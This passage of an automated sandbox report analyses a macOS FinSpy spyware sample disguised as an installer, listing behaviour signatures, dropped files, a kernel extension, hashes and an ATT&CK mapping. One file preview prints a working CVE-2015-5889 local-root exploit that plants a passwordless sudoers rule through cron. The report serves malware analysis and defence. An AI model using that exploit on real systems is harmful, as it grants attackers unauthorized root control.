ttributes:ofItemAtPath:error:bundlePathremoveItemAtPath:error:stringWithUTF8String:componentsSeparatedByString:objectAtIndex:intValueUTF8StringapplicationShouldTerminate:application:openFile:application:openFiles:application:openTempFile:applicationShouldOpenUntitledFile:applicationOpenUntitledFile:application:openFileWithoutUI:application:printFile:application:printFiles:withSettings:showPrintPanels:applicationShouldTerminateAfterLastWindowClosed:applicationShouldHandleReopen:hasVisibleWindows:applicationDockMenu:application:willPresentError:application:didRegisterForRemoteNotificationsWithDeviceToken:application:didFailToRegisterForRemoteNotificationsWithError:application:didReceiveRemoteNotification:application:willEncodeRestorableState:application:didDecodeRestorableState:applicationWillFinishLaunching:applicationDidFinishLaunching:applicationWillHide:applicationDidHide:applicationWillUnhide:applicationDidUnhide:applicationWillBecomeActive:applicationDidBecomeActive:applicationWillResignActive:applicationDidResignActive:applicationWillUpdate:applicationDidUpdate:applicationWillTerminate:applicationDidChangeScreenParameters:applicationDidChangeOcclusionState:isEqual:hashsuperclassclassselfzoneperformSelector:performSelector:withObject:performSelector:with

Source: helper3.290.dr

Mach-O __TEXT segment size: 0x4000 <= 16 KB

Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Sysctl read request: kern.safeboot (1.66)			Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl read request: kern.safeboot (1.66)			Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Sysctl read request: hw.availcpu (6.25)	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Sysctl read request: hw.memsize (6.24)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Sysctl read request: hw.ncpu (6.3)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Sysctl read request: hw.availcpu (6.25)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl read request: hw.ncpu (6.3)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl read request: hw.availcpu (6.25)	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Sysctl requested: kern.ostype (1.1)	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	Sysctl requested: kern.osrelease (1.2)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	Sysctl requested: kern.osrelease (1.2)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl requested: kern.osrelease (1.2)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl requested: kern.ostype (1.1)	Jump to behavior

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/Install Caglayan (PID: 772)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 778)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 802)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 828)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 836)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 843)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 850)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 857)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 864)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 871)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 879)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 886)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 893)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 900)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 907)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 914)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 921)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/sh (PID: 928)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /usr/bin/open (PID: 776)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/./Install alayan (PID: 789)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/MacOS/Adobe AIR Installer (PID: 816)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /var/folders/38/zm_ty_1144zdsp848dlcj5mw0000gn/T/airfbGVbH/mountPoint/Adobe AIR Installer.app/Contents/Frameworks/Adobe AIR.framework/Versions/1.0/Adobe AIR Application Installer.app/Contents/MacOS/Adobe AIR Application Installer (PID: 817)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 819)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 831)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 839)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 846)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 853)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 860)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 867)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 875)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 882)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 889)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 896)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 903)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 910)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 917)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /Library/Frameworks/Storage.framework/Contents/MacOS/logind (PID: 924)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior

Stealing of Sensitive Information:

Detected macOS FinSpy (FinFisher) trojan

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper3	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/installer	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Info.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/MacOS/logind	Jump to dropped file

Yara detected FinSpy

Show sources

Source: Yara match	File source: finfisher.dmg, type: SAMPLE
Source: Yara match	File source: installer, type: SAMPLE
Source: Yara match	File source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer, type: DROPPED

Source: /bin/sh (PID: 779)	System_profiler executable: /usr/sbin/system_profiler system_profiler SPUSBDataType			Jump to behavior
Source: /usr/sbin/system_profiler (PID: 779)	System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPUSBDataType -detailLevel full			Jump to behavior

Remote Access Functionality:

Detected macOS FinSpy (FinFisher) trojan

Show sources

Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/helper3	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/installer	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Info.plist	Jump to dropped file
Source: /Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer (PID: 777)	IOC file dropped: /Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/MacOS/logind	Jump to dropped file

Yara detected FinSpy

Show sources

Source: Yara match	File source: finfisher.dmg, type: SAMPLE
Source: Yara match	File source: installer, type: SAMPLE
Source: Yara match	File source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	LC_LOAD_DYLIB Addition1	LC_LOAD_DYLIB Addition1	Masquerading2	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting2	Launch Agent3	Launch Agent3	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	User Execution1	Launch Daemon2	Launch Daemon2	Disable or Modify Tools1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Plist Modification1	Plist Modification1	Scripting2	NTDS	System Information Discovery171	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Kernel Modules and Extensions12	Kernel Modules and Extensions12	Hidden Files and Directories21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Code Signing1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.winimage.com/zLibDll	finfisher.dmg	false	high
http://www.bluedomepress.com/about/termsofuse	finfisher.dmg	false	unknown
http://www.bluedomepress.com/about/privacypolicy	finfisher.dmg	false	unknown
http://www.bluedomepress.com	finfisher.dmg	false	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	30.0.0 Red Diamond
Analysis ID:	113412
Start date:	28.09.2020
Start time:	15:31:15
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 9m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	finfisher.dmg
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Detection:	MAL
Classification:	mal100.troj.evad.macDMG@0/49@0/0
Warnings:	Show All Excluded IPs from analysis (whitelisted): 17.253.57.205, 17.253.57.203, 23.54.113.182, 2.16.20.245, 17.253.57.202, 17.253.57.206, 17.253.55.206 Excluded domains from analysis (whitelisted): ocsp.apple.com, ssl-download.adobe.com.edgekey.net, e4578.dscf.akamaiedge.net, ocsp.g.aaplimg.com, e4578.dscd.akamaiedge.net, airdownload.adobe.com, world-gen.g.aaplimg.com, crl.adobe.com, crl.apple.com, ocsp-lb.apple.com.akadns.net, crl.adobe.com.edgekey.net

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Runtime Messages

Command:	open "/Volumes/caglayan-macos/Install Caglayan.app" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Created / dropped Files

/Users/ben/Library/Caches/.dat.nosync0309.NWxLXe Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Zip archive data, at least v2.0 to extract
Size (bytes):	1410834
Entropy (8bit):	7.999362082229836
Encrypted:	true
MD5:	EFDA151DFF928E14BA91AD2DBF0B27C1
SHA1:	6FA2C9E36D42734BD89101D4BD2F31CB5BA42AD7
SHA-256:	B53E15CB29C91D538D531C1243A29BF7BF31CA9AD8D5F001CDDEA9861394580D
SHA-512:	442991E6DCF8170D27ECDE88856609AA9171673E4E76F34440E64C7599978F1E59622ED6DFE6F24F72CF8215E55CAA9A9D254A7A851A2113B7CE22FD27C19643
Malicious:	false
Reputation:	low
Preview:	PK..........PL..............$.org.logind.ctp.archive/.. .........L.K.5...L.K.5.......5...PK..........PL...5v+.......$.org.logind.ctp.archive/helper.. .........u(..5...d...5...d...5....}y\|.E.xO......L<.1(....\.....;.....d2IF..0..`.I+...\PVQ.....Feu@q.D..bd.A...L.r.....9:.....~....t.{...z..Uu.....?...q.p.+..8.F.g..8........^....}T.=.kq.Zf..POB8.yX;..V......q.pwe.z....`S...+.3......Q...p......F.mT.....u../4...l..c.cU.........R.F.8-koX..."..&.....b...b(6..W0..[.....6....v;T..>.........9..........Ax.....fK..l.r-.g`.*......T..........%D...v..X..z.5.k..Y..b.8...@.q.z...P/.\|.....Ax{...-Ez...\k...ak.o .........'D_.................._..w&.....+D..j.;..P}s.P}.....G..Rd,.......2./:.W..F.>.d..5}.......\l(0..P.[......>.......TU..@..".)...n..j..`}....^......,....m...jT...ph. ...8..aL_a.....38..W./...._?c~.D...c............T.!U.o.?...b..-}.......r..X..2&.I..!..9.wX......F)t......R!I.4+..UF.c...6rt.%`>..8...C.............\....$K..WO...p';.."snr..<F.....w.

/Users/ben/Library/Caches/org.logind.ctp.archive/helper Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	34292
Entropy (8bit):	4.906067515306722
Encrypted:	false
MD5:	AFB46530D6693A3086302D8069292540
SHA1:	72CB14BC737A9D77C040AFFA60521686FFA80B84
SHA-256:	562C420921F5146273B513D17B9F470A99BD676E574C155376C3EB19C37BAA09
SHA-512:	823627151771C0910BB821817318D275F2547D4723C4F0546950194896ADDE64540B16E7DD7825582BF56884D4A1572341B7FCB98B3233EAE6D5E9D80EC60FC1
Malicious:	true
Reputation:	low
Preview:	....................X..... .........H...__PAGEZERO..............................................................__TEXT...................P...............P......................__text..........__TEXT..................g&......................................__stubs.........__TEXT...........C...............C..............................__stub_helper...__TEXT...........C......<........C..............................__cstring.......__TEXT...........E......g........E..............................__objc_methname.__TEXT..........gG......\|.......gG..............................__objc_classname__TEXT...........I......H........I..............................__objc_methtype.__TEXT..........+J......6.......+J..............................__unwind_info...__TEXT..........aJ..............aJ..............................__eh_frame......__TEXT...........J...............J......................................__DATA...........P...............P..............................__program_vars..__DATA..........

/Users/ben/Library/Caches/org.logind.ctp.archive/helper2 Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Python script, ASCII text executable
Size (bytes):	975
Entropy (8bit):	5.288100729712383
Encrypted:	false
MD5:	762588BCBCF5E7C72D8F28EB3F6A58EA
SHA1:	9A0EDE8FAD59E7252502881554BE0C21972238C9
SHA-256:	AF4AD3B8BF81A877A47DED430AC27FDCB3DDD33D3ACE52395F76CBDDE46DBFE0
SHA-512:	76BE663DD092F79D62CDC9FA76D29CE55C3A771DD72DBDADF808FD00DE5850B090A7A67FB0E9B150D908A1C6F3801ED02200F66D74AA328FEED44BCEA72AB20E
Malicious:	true
Yara Hits:	Rule: hacktool_macos_exploit_cve_5889, Description: http://www.cvedetails.com/cve/cve-2015-5889, Source: /Users/ben/Library/Caches/org.logind.ctp.archive/helper2, Author: @mimeframe
Reputation:	low
Preview:	# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root.# tested on osx 10.9.5 / 10.10.5.# jul/2015.# by rebel..import os,time,sys..from sys import argv.script, param = argv..env = {}..s = os.stat("/etc/sudoers").st_size..env['MallocLogFile'] = '/etc/crontab'.env['MallocStackLogging'] = 'yes'.env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'..#sys.stderr.write("creating /etc/crontab..")..p = os.fork().if p == 0:...os.close(1)..os.close(2)..os.execve("/usr/bin/rsh",["rsh","localhost"],env)..time.sleep(1)..if "NOPASSWD" not in open("/etc/crontab").read():..sys.stderr.write("failed\n")..sys.exit(-1)..#sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")..while os.stat("/etc/sudoers").st_size == s:.#.sys.stderr.write(".")...time.sleep(1)..#sys.stderr.write("\ndone\n")..my_command = "sudo chmod 06777 %s & sudo chown root:wheel %s" % (param, param).os.system(my_command).

/Users/ben/Library/Caches/org.logind.ctp.archive/helper3 Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Mach-O i386 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE\|NO_HEAP_EXECUTION>
Size (bytes):	27364
Entropy (8bit):	4.197792176552206
Encrypted:	false
MD5:	FF60B386905D7D832CB5E25F985D15CA
SHA1:	427A1C1DAF9030069F0C771CE172C104513A7722
SHA-256:	6AB836D19BC4B69DFE733BEEF295809E15ACE232BE0740BC326F58F9D31D8197
SHA-512:	73E845902E6BB481F844569E52C94EF5393192C7FB31985A0AEF29D69DBE4DA9AC70A4C1462472921AAC081BF7347CC996B6555EB33C2A0B754499BAD9ACF02E
Malicious:	true
Reputation:	low
Preview:	.......................... .........__TEXT...............@.......@..................__text..........__TEXT..............X/..............................__symbol_stub...__TEXT..........H;......H;..........................__stub_helper...__TEXT...........<..V....<..........................__cstring.......__TEXT..........f=..H...f=..........................__unwind_info...__TEXT...........?..H....?..............................H...__DATA...........@.......@......................__nl_symbol_ptr.__DATA...........@.......@..................!.......__la_symbol_ptr.__DATA...........@.......@..................&.......__cfstring......__DATA...........@.......@..........................__bss...........__DATA...........@......................................H...__OBJC...........P.......P......................__cls_refs......__OBJC...........P.......P..........................__message_refs..__OBJC...........P.......P..........................__module_info...__OBJC...........P.. ....P..............

/Users/ben/Library/Caches/org.logind.ctp.archive/installer Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	63396
Entropy (8bit):	5.1375229164075815
Encrypted:	false
MD5:	6E427B21B601165386CA36D852E49C02
SHA1:	A65965B960B3D322BBAE467F51BF215D574B00CC
SHA-256:	AC414A14464BF38A59B8ACDFCDF1C76451C2D79DA0B3F2E53C07ED1C94AEDDCD
SHA-512:	CAB596A9CA8AAB00B9A3C30578E3D74CDB8E6F25A1DBA901BA275F256D9E4FFA8E757047FBC830E8F8336D8CE1C2269CCE66028976535A72CE8D3D8C8D70FA8D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_FinSpy_2, Description: Yara detected FinSpy, Source: /Users/ben/Library/Caches/org.logind.ctp.archive/installer, Author: Joe Security
Reputation:	low
Preview:	....................X..... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..................CU......................................__stubs.........__TEXT..........$p..............$p..............................__stub_helper...__TEXT...........q...............q..............................__gcc_except_tab__TEXT...........r...............r..............................__const.........__TEXT..........................................................__objc_methname.__TEXT..........................................................__cstring.......__TEXT..........8...............8...............................__objc_classname__TEXT..................Y.......................................__objc_methtype.__TEXT..........n.......m.......n...............................__unwind_info...__TEXT.................t......................................__eh_frame......__TEXT..

/Users/ben/Library/Caches/org.logind.ctp.archive/logind Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Size (bytes):	34432
Entropy (8bit):	5.5710927445243525
Encrypted:	false
MD5:	6BFEB5419FB74F46FBBDBA90F1B817FD
SHA1:	62E5DC40BFABAA712CD9E32AC755384DB07F0DAB
SHA-256:	02E4D0E23391BBBB75C47F5DB44D119176803DA74B1C170250E848DE51632AE9
SHA-512:	4174A378ACC52AFC2D820CB8B5988563B7C91A666703992C6CD1677D0B5CB5C0DC65FAB0779B24920AA9F6E2F517668B06FFFE9CC05FB3C880AB29F4CF44780B
Malicious:	true
Reputation:	low
Preview:	....................0..... .........H...__PAGEZERO..........................................................h...__TEXT...................P...............P......................__text..........__TEXT...................3......................................__stubs.........__TEXT...........@...............@..............................__stub_helper...__TEXT...........A......<........A..............................__cstring.......__TEXT...........B......~........B..............................__objc_methname.__TEXT..........:D..............:D..............................__const.........__TEXT...........F...............F..............................__objc_classname__TEXT...........H......H........H..............................__objc_methtype.__TEXT...........H......6........H..............................__unwind_info...__TEXT...........I...............I..............................__eh_frame......__TEXT...........I......P........I..................................H...__DATA..........

/Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/Info.plist Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
File Type:	XML 1.0 document, UTF-8 Unicode text
Size (bytes):	1563
Entropy (8bit):	5.116727503787949
Encrypted:	false
MD5:	95B68FBA3B6704FD8D2077C06F1F65F0
SHA1:	A44579AD3CAD73ACAB510E6AF9ACE69234716842
SHA-256:	B882D79B6965C5864DB91704B8FEB7CE4865AC7466F025F5685441F1D698A724
SHA-512:	30E6A7933FF2749966963574D4C973531D3858306307937A42C91A1991C41199A907BCF63C64681287640D04275844C969D2F3B23A4B9983B21ACAF6F1A95F7A
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>13E28</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>logind</string>..<key>CFBundleIdentifier</key>..<string>logind.logind</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>logind</string>..<key>CFBundlePackageType</key>..<string>KEXT</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>5B1008</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>13C64</string>..<key>DTSDKName</key>..<string>m

/Users/ben/Library/Caches/org.logind.ctp.archive/logind.kext/Contents/MacOS/logind Download File
Process:	/Volumes/caglayan-macos/Install Caglayan.app/Contents/MacOS/.log/ARA0848.app/Contents/MacOS/installer
